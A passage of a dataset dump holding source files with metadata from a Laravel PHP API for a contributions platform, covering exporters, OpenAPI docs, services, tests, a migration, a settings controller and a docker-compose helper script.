"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Exporters;\n\nuse Illuminate\\Support\\Facades\\Date;\n\nclass AllExporter extends BaseExporter\n{\n /**\n * @return string\n */\n protected function filename(): string\n {\n return 'all_export_' . Date::now()->format('Y_m_d') . '.zip';\n }\n\n /**\n * @return array\n */\n protected function data(): array\n {\n // TODO: Use actual logic for the \"all\" export.\n\n return [\n ['Heading 1', 'Heading 2'],\n ['John Doe', 1995],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5381795763969421,
"alphanum_fraction": 0.5387904644012451,
"avg_line_length": 37.069766998291016,
"blob_id": "9a9bd4c01450a681d6789fa3b6e297dfe9c656ec",
"content_id": "35b57567e38f2fdd7c721b09cf137be1cf4bc394",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1637,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 43,
"path": "/app/Docs/Schemas/Setting/SettingsSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\Setting;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass SettingsSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->properties(\n Schema::object('frontend_content')->properties(\n Schema::object('home_page')->properties(\n // TODO: Fill in from designs.\n Schema::string('title')\n )\n ),\n Schema::object('email_content')->properties(\n Schema::object('admin')->properties(\n EmailContentSchema::create('new_contribution'),\n EmailContentSchema::create('updated_contribution'),\n EmailContentSchema::create('new_end_user'),\n EmailContentSchema::create('password_reset')\n ),\n Schema::object('end_user')->properties(\n EmailContentSchema::create('email_confirmation'),\n EmailContentSchema::create('password_reset'),\n EmailContentSchema::create('contribution_approved'),\n EmailContentSchema::create('contribution_rejected')\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5615127086639404,
"alphanum_fraction": 0.5619913935661316,
"avg_line_length": 35.017242431640625,
"blob_id": "fdaa62e59fba05c4b2f7f54f07fb3033b3cd1a07",
"content_id": "8795ab51b3a3f50f65fdba9ad7efbdefabf077ab",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2089,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 58,
"path": "/app/Docs/Operations/Export/RequestExportOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Export;\n\nuse App\\Docs\\Schemas\\File\\FileDownloadUrlSchema;\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Tags\\ExportsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass RequestExportOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_POST)\n ->summary('Request a download URL for a specific export')\n ->description(\n Utils::operationDescription(\n [Admin::class],\n sprintf(\n <<<'EOT'\n This returns a download URL which will expire within %d seconds, and can \n only be accessed once.\n EOT,\n Config::get('connecting_voices.file_tokens.expiry_time')\n )\n )\n )\n ->tags(ExportsTag::create())\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n ResourceSchema::create(\n null,\n FileDownloadUrlSchema::create()->properties(\n Schema::string('decryption_key'),\n ...FileDownloadUrlSchema::object()->properties\n )\n )\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6064879894256592,
"alphanum_fraction": 0.607898473739624,
"avg_line_length": 21.15625,
"blob_id": "28a49f1007ce05080f6611ec3fa882ba076658e4",
"content_id": "c515ff31f0c055c0bb83a4400a973ddd4373b3e8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 709,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 32,
"path": "/app/Services/FileService.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Services;\n\nuse App\\Events\\File\\FileRequested;\nuse App\\Models\\Admin;\nuse App\\Models\\File;\nuse App\\Models\\FileToken;\nuse Illuminate\\Support\\Facades\\Date;\n\nclass FileService\n{\n /**\n * @param \\App\\Models\\File $file\n * @param \\App\\Models\\Admin $admin\n * @return \\App\\Models\\FileToken\n */\n public function request(File $file, Admin $admin): FileToken\n {\n /** @var \\App\\Models\\FileToken $fileToken */\n $fileToken = $file->fileTokens()->create([\n 'user_id' => $admin->user_id,\n 'created_at' => Date::now(),\n ]);\n\n event(new FileRequested($file, $fileToken));\n\n return $fileToken;\n }\n}\n"
},
{
"alpha_fraction": 0.5663343667984009,
"alphanum_fraction": 0.56952965259552,
"avg_line_length": 33.31578826904297,
"blob_id": "a948adfbf62debc0da8c219779190926a4644963",
"content_id": "fc0f5d432f45addb54cc8bd786c3682bf05ada98",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 7824,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 228,
"path": "/tests/Unit/Services/EndUserServiceTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Services;\n\nuse App\\Events\\EndUser\\EndUserCreated;\nuse App\\Events\\EndUser\\EndUserForceDeleted;\nuse App\\Events\\EndUser\\EndUserSoftDeleted;\nuse App\\Events\\EndUser\\EndUserUpdated;\nuse App\\Models\\Contribution;\nuse App\\Models\\EndUser;\nuse App\\Models\\Tag;\nuse App\\Services\\EndUserService;\nuse Illuminate\\Support\\Facades\\Event;\nuse Illuminate\\Support\\Facades\\Hash;\nuse Tests\\TestCase;\n\nclass EndUserServiceTest extends TestCase\n{\n /** @test */\n public function it_creates_a_user_and_end_user_record(): void\n {\n /** @var \\App\\Services\\EndUserService $endUserService */\n $endUserService = resolve(EndUserService::class);\n\n $endUser = $endUserService->create([\n 'email' => '[email protected]',\n 'password' => 'secret',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Mixed Asian/White',\n ]);\n\n $this->assertDatabaseHas('users', ['id' => $endUser->user_id]);\n $this->assertDatabaseHas('end_users', ['id' => $endUser->id]);\n $this->assertEquals('[email protected]', $endUser->user->email);\n $this->assertTrue(Hash::check('secret', $endUser->user->password));\n $this->assertEquals('United Kingdom', $endUser->country);\n $this->assertEquals(1995, $endUser->birth_year);\n $this->assertEquals('Male', $endUser->gender);\n $this->assertEquals('Mixed Asian/White', $endUser->ethnicity);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_created(): void\n {\n Event::fake([EndUserCreated::class]);\n\n /** @var \\App\\Services\\EndUserService $endUserService */\n $endUserService = resolve(EndUserService::class);\n\n $endUser = $endUserService->create([\n 'email' => '[email protected]',\n 'password' => 'secret',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Mixed Asian/White',\n ]);\n\n Event::assertDispatched(\n EndUserCreated::class,\n function (EndUserCreated $event) use ($endUser): bool {\n return $event->getEndUser()->is($endUser);\n }\n );\n }\n\n /** @test */\n public function it_updates_a_user_and_end_user_record(): void\n {\n /** @var \\App\\Services\\EndUserService $endUserService */\n $endUserService = resolve(EndUserService::class);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n $endUser = $endUserService->update($endUser, [\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Mixed Asian/White',\n 'email' => '[email protected]',\n 'password' => 'secret',\n ]);\n\n $this->assertEquals('[email protected]', $endUser->user->email);\n $this->assertTrue(Hash::check('secret', $endUser->user->password));\n $this->assertEquals('United Kingdom', $endUser->country);\n $this->assertEquals(1995, $endUser->birth_year);\n $this->assertEquals('Male', $endUser->gender);\n $this->assertEquals('Mixed Asian/White', $endUser->ethnicity);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_updated(): void\n {\n Event::fake([EndUserUpdated::class]);\n\n /** @var \\App\\Services\\EndUserService $endUserService */\n $endUserService = resolve(EndUserService::class);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n $endUser = $endUserService->update($endUser, [\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Mixed Asian/White',\n 'email' => '[email protected]',\n 'password' => 'secret',\n 
]);\n\n Event::assertDispatched(\n EndUserUpdated::class,\n function (EndUserUpdated $event) use ($endUser): bool {\n return $event->getEndUser()->is($endUser);\n }\n );\n }\n\n /** @test */\n public function it_soft_deletes_a_user_record(): void\n {\n /** @var \\App\\Services\\EndUserService $endUserService */\n $endUserService = resolve(EndUserService::class);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)->create([\n 'end_user_id' => $endUser->id,\n ]);\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n $contribution->tags()->sync([$tag->id]);\n\n $endUser = $endUserService->softDelete($endUser);\n\n $this->assertDatabaseHas('end_users', ['id' => $endUser->id]);\n $this->assertDatabaseHas('users', ['id' => $endUser->user->id]);\n $this->assertSoftDeleted('users', ['id' => $endUser->user->id]);\n $this->assertNotNull($endUser->user->deleted_at);\n $this->assertDatabaseHas('contributions', ['id' => $contribution->id]);\n $this->assertDatabaseHas('contribution_tag', [\n 'contribution_id' => $contribution->id,\n 'tag_id' => $tag->id,\n ]);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_soft_deleted(): void\n {\n Event::fake([EndUserSoftDeleted::class]);\n\n /** @var \\App\\Services\\EndUserService $endUserService */\n $endUserService = resolve(EndUserService::class);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n $endUser = $endUserService->softDelete($endUser);\n\n Event::assertDispatched(\n EndUserSoftDeleted::class,\n function (EndUserSoftDeleted $event) use ($endUser): bool {\n return $event->getEndUser()->is($endUser);\n }\n );\n }\n\n /** @test */\n public function it_force_deletes_a_user_and_user_user_and_contribution_tag_records(): void\n {\n /** @var \\App\\Services\\EndUserService $endUserService */\n $endUserService = resolve(EndUserService::class);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = factory(Contribution::class)->create([\n 'end_user_id' => $endUser->id,\n ]);\n\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n $contribution->tags()->sync([$tag->id]);\n\n $endUserService->forceDelete($endUser);\n\n $this->assertDatabaseMissing('end_users', ['id' => $endUser->id]);\n $this->assertDatabaseMissing('users', ['id' => $endUser->user->id]);\n $this->assertDatabaseMissing('contributions', ['id' => $contribution->id]);\n $this->assertDatabaseMissing('contribution_tag', [\n 'contribution_id' => $contribution->id,\n 'tag_id' => $tag->id,\n ]);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_force_deleted(): void\n {\n Event::fake([EndUserForceDeleted::class]);\n\n /** @var \\App\\Services\\EndUserService $endUserService */\n $endUserService = resolve(EndUserService::class);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n $endUserService->forceDelete($endUser);\n\n Event::assertDispatched(\n EndUserForceDeleted::class,\n function (EndUserForceDeleted $event) use ($endUser): bool {\n return $event->getEndUser()->is($endUser);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.4716279208660126,
"alphanum_fraction": 0.476279079914093,
"avg_line_length": 21.87234115600586,
"blob_id": "c27b5126ecaedcf21400ce4bc40c1e23265f0f26",
"content_id": "3d274e51ab8fd3a7d628aa8fe0a278ab6f39ad8e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1075,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 47,
"path": "/develop",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# Disable pseudo-TTY allocation for CI. The -T flag removes interaction.\nTTY=\"\"\n\n# Travis CI provides a CI environment variable which can be used to check if\n# this is running in a CI environment.\nif [[ ${CI:-false} == \"true\" ]]; then\n TTY=\"-T\"\nfi\n\n# Pass arguments to docker-compose, or default to docker-compose ps.\nif [[ $# -gt 0 ]]; then\n case \"$1\" in\n\n art|artisan )\n shift 1\n docker-compose run --rm ${TTY} \\\n api \\\n php artisan \"$@\"\n ;;\n\n composer )\n shift 1\n docker-compose run --rm ${TTY} \\\n api \\\n composer \"$@\"\n ;;\n\n npm )\n shift 1\n docker-compose run --rm ${TTY} \\\n node \\\n npm \"$@\"\n ;;\n\n cfn|cloudformation )\n docker-compose run --rm troposphere > aws/${CFN_TEMPLATE}.json\n cat aws/${CFN_TEMPLATE}.json\n ;;\n\n * ) docker-compose \"$@\"; ;;\n\n esac\nelse\n docker-compose ps\nfi\n"
},
{
"alpha_fraction": 0.7056737542152405,
"alphanum_fraction": 0.7068557739257812,
"avg_line_length": 29.214284896850586,
"blob_id": "5be54f9f0f5e6d5643a3c31d057895d7975ca5f1",
"content_id": "3ec14aefb202628963f7891b797830439ee79124",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 846,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 28,
"path": "/app/Docs/Paths/Settings/SettingsRootPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Settings;\n\nuse App\\Docs\\Operations\\Settings\\IndexSettingsOperation;\nuse App\\Docs\\Operations\\Settings\\UpdateSettingsOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\n\nclass SettingsRootPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/settings')\n ->operations(\n IndexSettingsOperation::create(),\n UpdateSettingsOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6103731989860535,
"alphanum_fraction": 0.6110056638717651,
"avg_line_length": 31.9375,
"blob_id": "223d69fcf883fd7d409f6cd0c32f5b818accfa25",
"content_id": "b5e1615afce66a1d3f89536bcf3c1d02a909c870",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1581,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 48,
"path": "/app/Docs/Operations/EndUser/ShowEndUserOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\EndUser;\n\nuse App\\Docs\\Schemas\\EndUser\\EndUserSchema;\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Tags\\EndUsersTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\n\nclass ShowEndUserOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('Get a specific end user')\n ->description(\n Utils::operationDescription(\n [Admin::class, EndUser::class],\n <<<'EOT'\n * If an end user is making the request, then they can only access their own\n end user resource.\n EOT\n )\n )\n ->tags(EndUsersTag::create())\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, EndUserSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5743073225021362,
"alphanum_fraction": 0.5751469135284424,
"avg_line_length": 17.045454025268555,
"blob_id": "bdb7b22fe4a28a452a8301986290879a79dea261",
"content_id": "ff28f944cbec505b59648ca2148c3a1de4acbf35",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1191,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 66,
"path": "/app/Sms/GenericSms.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Sms;\n\nuse Illuminate\\Bus\\Queueable;\nuse Illuminate\\Contracts\\Queue\\ShouldQueue;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Queue\\InteractsWithQueue;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass GenericSms implements ShouldQueue\n{\n use Dispatchable;\n use InteractsWithQueue;\n use Queueable;\n\n /**\n * @var string\n */\n protected $to;\n\n /**\n * @var string\n */\n protected $body;\n\n /**\n * Dispatcher constructor.\n *\n * @param string $to\n * @param string $body\n */\n public function __construct(string $to, string $body)\n {\n $this->to = $to;\n $this->body = $body;\n }\n\n /**\n * Dispatch the email as a job to the queue.\n *\n * @param \\App\\Sms\\SmsSender $sender\n */\n public function handle(SmsSender $sender): void\n {\n $sender->send(Config::get('sms.from'), $this->to, $this->body);\n }\n\n /**\n * @return string\n */\n public function getTo(): string\n {\n return $this->to;\n }\n\n /**\n * @return string\n */\n public function getBody(): string\n {\n return $this->body;\n }\n}\n"
},
{
"alpha_fraction": 0.601170539855957,
"alphanum_fraction": 0.6020066738128662,
"avg_line_length": 25.577777862548828,
"blob_id": "512dcc86515cdfe324f093977b8a67fc7e2e3cfe",
"content_id": "1361a4676c25be1e7b63aba2ac7c33664ae75848",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1196,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 45,
"path": "/app/VariableSubstitution/Email/Admin/NewContributionSubstituter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\VariableSubstitution\\Email\\Admin;\n\nuse App\\Models\\Contribution;\nuse App\\VariableSubstitution\\BaseVariableSubstituter;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass NewContributionSubstituter extends BaseVariableSubstituter\n{\n /**\n * @var \\App\\Models\\Contribution\n */\n protected $contribution;\n\n /**\n * NewContribution constructor.\n *\n * @param \\App\\Models\\Contribution $contribution\n */\n public function __construct(Contribution $contribution)\n {\n $this->contribution = $contribution;\n }\n\n /**\n * @return array\n */\n protected function variables(): array\n {\n return [\n 'END_USER_EMAIL' => $this->contribution->endUser->user->email,\n 'CONTRIBUTION_CONTENT' => $this->contribution->content,\n 'CONTRIBUTION_STATUS' => $this->contribution->status,\n 'CONTRIBUTION_CREATED_AT' => $this->contribution->created_at\n ->format(Config::get('connecting_voices.datetime_format')),\n 'TAGS' => $this->contribution\n ->tags()\n ->pluck('name')\n ->implode(', '),\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.64402174949646,
"alphanum_fraction": 0.64673912525177,
"avg_line_length": 17.399999618530273,
"blob_id": "25a1aa0a80afd120740957ced58e604794af0081",
"content_id": "f2982816ea368e2fea146ae116138b805694afcd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 368,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 20,
"path": "/app/Exceptions/RiskyPathException.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Exceptions;\n\nuse RuntimeException;\n\nclass RiskyPathException extends RuntimeException\n{\n /**\n * RiskyPathException constructor.\n *\n * @param string $path\n */\n public function __construct(string $path)\n {\n parent::__construct(\"The path [{$path}] must be within the storage path.\");\n }\n}\n"
},
{
"alpha_fraction": 0.5733015537261963,
"alphanum_fraction": 0.5744934678077698,
"avg_line_length": 24.42424201965332,
"blob_id": "ac64d6cc360f2434c8db79a2deb91b751aab46f2",
"content_id": "60c02fbb09cb94cb2774a21ff608c0f2dfe884c6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 839,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 33,
"path": "/database/migrations/2019_05_29_105621_create_file_tokens_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass CreateFileTokensTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::create('file_tokens', function (Blueprint $table): void {\n $table->uuid('id')->primary();\n $table->uuid('file_id');\n $table->foreign('file_id')->references('id')->on('files');\n $table->uuid('user_id');\n $table->foreign('user_id')->references('id')->on('users');\n $table->timestamp('created_at')->useCurrent();\n });\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::dropIfExists('file_tokens');\n }\n}\n"
},
{
"alpha_fraction": 0.649789035320282,
"alphanum_fraction": 0.652601957321167,
"avg_line_length": 25.33333396911621,
"blob_id": "c4109a6755d449a04bf54c1fc21363b598b34812",
"content_id": "eff18f63763ad9d25472ca58f66822b4f13a4e3b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 711,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 27,
"path": "/app/Docs/Parameters/PageParameter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Parameters;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass PageParameter extends Parameter\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->in(static::IN_QUERY)\n ->name('page')\n ->description('The page offset')\n ->schema(\n Schema::integer()->default(1)\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5259537100791931,
"alphanum_fraction": 0.526370644569397,
"avg_line_length": 38.974998474121094,
"blob_id": "b1240f25c9e3b8ad21a1da56cf9ab4435a1885f9",
"content_id": "2dfe762f3074850a3c40aa5997243b3d01e115b3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4797,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 120,
"path": "/app/Http/Controllers/V1/SettingController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Requests\\Setting\\UpdateSettingRequest;\nuse App\\Models\\Setting;\nuse App\\Services\\SettingService;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\JsonResponse;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass SettingController extends ApiController\n{\n /**\n * @var \\App\\Services\\SettingService\n */\n protected $settingService;\n\n /**\n * SettingController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n * @param \\App\\Services\\SettingService $settingService\n */\n public function __construct(\n Request $request,\n Pagination $pagination,\n SettingService $settingService\n ) {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified'])->except('index');\n\n $this->settingService = $settingService;\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @throws \\Illuminate\\Auth\\Access\\AuthorizationException\n * @return \\Illuminate\\Http\\JsonResponse\n */\n public function index(Request $request): JsonResponse\n {\n $this->authorize('list', Setting::class);\n\n event(EndpointInvoked::onRead($request, 'Viewed settings.'));\n\n return Setting::toResponse(\n optional($request->user('api'))->isAdmin() ?? false\n );\n }\n\n /**\n * @param \\App\\Http\\Requests\\Setting\\UpdateSettingRequest $request\n * @throws \\Illuminate\\Auth\\Access\\AuthorizationException\n * @return \\Illuminate\\Http\\JsonResponse\n */\n public function update(UpdateSettingRequest $request): JsonResponse\n {\n $this->authorize('update', Setting::class);\n\n DB::transaction(function () use ($request): void {\n $this->settingService->update([\n 'frontend_content' => [\n 'home_page' => [\n 'title' => $request->input('frontend_content.home_page.title'),\n ],\n ],\n 'email_content' => [\n 'admin' => [\n 'new_contribution' => [\n 'subject' => $request->input('email_content.admin.new_contribution.subject'),\n 'body' => $request->input('email_content.admin.new_contribution.body'),\n ],\n 'updated_contribution' => [\n 'subject' => $request->input('email_content.admin.updated_contribution.subject'),\n 'body' => $request->input('email_content.admin.updated_contribution.body'),\n ],\n 'new_end_user' => [\n 'subject' => $request->input('email_content.admin.new_end_user.subject'),\n 'body' => $request->input('email_content.admin.new_end_user.body'),\n ],\n 'password_reset' => [\n 'subject' => $request->input('email_content.admin.password_reset.subject'),\n 'body' => $request->input('email_content.admin.password_reset.body'),\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject' => $request->input('email_content.end_user.email_confirmation.subject'),\n 'body' => $request->input('email_content.end_user.email_confirmation.body'),\n ],\n 'password_reset' => [\n 'subject' => $request->input('email_content.end_user.password_reset.subject'),\n 'body' => $request->input('email_content.end_user.password_reset.body'),\n ],\n 'contribution_approved' => [\n 'subject' => $request->input('email_content.end_user.contribution_approved.subject'),\n 'body' => $request->input('email_content.end_user.contribution_approved.body'),\n ],\n 'contribution_rejected' => [\n 'subject' => $request->input('email_content.end_user.contribution_rejected.subject'),\n 'body' => 
$request->input('email_content.end_user.contribution_rejected.body'),\n ],\n ],\n ],\n ]);\n });\n\n event(EndpointInvoked::onUpdate($request, 'Updated settings.'));\n\n return Setting::toResponse(Setting::WITH_PRIVATE);\n }\n}\n"
},
{
"alpha_fraction": 0.7176981568336487,
"alphanum_fraction": 0.7187839150428772,
"avg_line_length": 30.758621215820312,
"blob_id": "f2d8a927a17ec79681682e44d200dcaa12ed9863",
"content_id": "d16f4533de93094915d68ac1eb7274d69741bf04",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 921,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 29,
"path": "/app/Docs/Paths/Contributions/ContributionsRootPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Contributions;\n\nuse App\\Docs\\Operations\\Contributions\\IndexContributionOperation;\nuse App\\Docs\\Operations\\Contributions\\StoreContributionOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\n\nclass ContributionsRootPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/contributions')\n ->operations(\n IndexContributionOperation::create(),\n StoreContributionOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5966386795043945,
"alphanum_fraction": 0.5978391170501709,
"avg_line_length": 25.03125,
"blob_id": "ab264763fe47d19f2eae6fc224825194da28cb67",
"content_id": "90024d263273fb0325a218f7eb5f3a24246083cd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 833,
"license_type": "permissive",
"max_line_length": 86,
